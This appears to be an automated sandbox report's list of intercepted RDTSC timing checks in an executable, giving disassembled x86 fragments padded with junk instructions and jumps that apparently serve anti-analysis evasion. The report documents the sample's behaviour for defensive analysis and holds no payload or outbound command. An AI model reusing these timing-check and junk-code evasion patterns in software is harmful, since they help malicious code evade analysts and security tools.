Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: C14783 second address: C147A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5FC0E77A06h 0x0000000a popad 0x0000000b jp 00007F5FC0E77A08h 0x00000011 pushad 0x00000012 jnp 00007F5FC0E77A0Eh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: C147A1 second address: C147B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5FC0CE52CDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CAA9FE second address: CAAA22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FC0E77A18h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CAD4C0 second address: CAD4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F5FC0CE52C8h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F5FC0CE52CBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB236E second address: CB238D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5FC0E77A1Ah 0x00000008 jmp 00007F5FC0E77A14h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB1683 second address: CB1695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ecx 0x0000000a jne 00007F5FC0CE52CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB17E2 second address: CB1809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5FC0E77A06h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5FC0E77A0Ch 0x00000011 jmp 00007F5FC0E77A0Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB1809 second address: CB180D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB656E second address: CB6572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB6572 second address: CB6576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB6576 second address: CB6582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5FC0E77A06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB6744 second address: CB6751 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB69EB second address: CB6A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: C6A1AF second address: C6A24D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5FC0CE52C8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D24BEh], edx 0x0000002a push 00000004h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F5FC0CE52C8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 jmp 00007F5FC0CE52CCh 0x0000004b mov di, BFDBh 0x0000004f nop 0x00000050 jnp 00007F5FC0CE52E1h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F5FC0CE52CDh 0x0000005e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: C6A24D second address: C6A252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB782F second address: CB7843 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5FC0CE52C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F5FC0CE52C6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB7843 second address: CB784D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5FC0E77A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB784D second address: CB7853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB7853 second address: CB7859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CB7859 second address: CB785D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CBA9FC second address: CBAA01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CBA377 second address: CBA384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5FC0CE52C6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CBA384 second address: CBA38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CC1967 second address: CC196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CC196C second address: CC1978 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5FC0E77A0Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CC1C05 second address: CC1C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CC24F1 second address: CC250C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5FC0E77A06h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F5FC0E77A0Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CC250C second address: CC2516 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5FC0CE52C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CC2516 second address: CC251F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CC251F second address: CC2527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CC773B second address: CC775B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F5FC0E77A06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F5FC0E77A11h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CCA4E7 second address: CCA532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CFh 0x00000007 jl 00007F5FC0CE52DCh 0x0000000d jmp 00007F5FC0CE52D6h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F5FC0CE52D9h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CCA91B second address: CCA91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CCAAC4 second address: CCAAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CCAD43 second address: CCAD49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CCAD49 second address: CCAD4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CCAD4D second address: CCAD6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5FC0E77A18h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CCAEC1 second address: CCAEFF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop eax 0x0000000a jnc 00007F5FC0CE52DDh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5FC0CE52D0h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CCAEFF second address: CCAF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CCAF05 second address: CCAF0D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CCAF0D second address: CCAF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD17D4 second address: CD17D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD195B second address: CD1969 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD1969 second address: CD196D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD196D second address: CD1971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD1971 second address: CD1977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD2405 second address: CD2416 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD2416 second address: CD241C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD241C second address: CD2428 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5FC0E77A0Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD269E second address: CD26A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD345A second address: CD345E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD345E second address: CD3464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD3464 second address: CD3481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5FC0E77A17h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD3481 second address: CD3485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD3485 second address: CD349D instructions: 0x00000000 rdtsc 0x00000002 je 00007F5FC0E77A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F5FC0E77A0Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD1331 second address: CD1337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CD1337 second address: CD135E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5FC0E77A14h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CDC04D second address: CDC051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CDC051 second address: CDC059 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CDC059 second address: CDC064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5FC0CE52C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CDD618 second address: CDD61C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CDFA60 second address: CDFA66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CDFA66 second address: CDFA6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CDFA6C second address: CDFA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CDFA70 second address: CDFA9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5FC0E77A10h 0x00000010 jmp 00007F5FC0E77A0Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CEA5EF second address: CEA618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5FC0CE52C6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007F5FC0CE52CFh 0x00000016 pushad 0x00000017 jg 00007F5FC0CE52C6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CEA19B second address: CEA1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CEA1A1 second address: CEA1AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF0CC7 second address: CF0CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF0CCB second address: CF0CE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF0CE3 second address: CF0CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF0CE9 second address: CF0CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF06A4 second address: CF06AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF06AA second address: CF06B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF06B0 second address: CF070C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a ja 00007F5FC0E77A06h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 jo 00007F5FC0E77A08h 0x0000001e pushad 0x0000001f popad 0x00000020 push ecx 0x00000021 push edi 0x00000022 pop edi 0x00000023 pop ecx 0x00000024 jmp 00007F5FC0E77A19h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5FC0E77A0Bh 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF070C second address: CF0710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF0888 second address: CF088D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF52DD second address: CF52E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF52E3 second address: CF52E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: CF52E8 second address: CF52EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D089E2 second address: D089F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D089F1 second address: D08A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5FC0CE52D6h 0x00000009 jo 00007F5FC0CE52C6h 0x0000000f popad 0x00000010 jmp 00007F5FC0CE52D9h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D072A4 second address: D072AE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5FC0E77A06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D07422 second address: D07431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jl 00007F5FC0CE52C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D07866 second address: D07870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D079B2 second address: D079B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D07CD1 second address: D07CF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D07CF5 second address: D07CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D07CF9 second address: D07D09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0E77A0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D07D09 second address: D07D2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52D0h 0x00000007 pushad 0x00000008 ja 00007F5FC0CE52C6h 0x0000000e jno 00007F5FC0CE52C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D0DA98 second address: D0DAA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D0DAA2 second address: D0DAC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5FC0CE52CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F5FC0CE52C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D0DAC0 second address: D0DAD1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5FC0E77A06h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D0DAD1 second address: D0DAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\A3nofpjN9A.exe RDTSC instruction interceptor: First address: D0DC2D second address: D0DC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
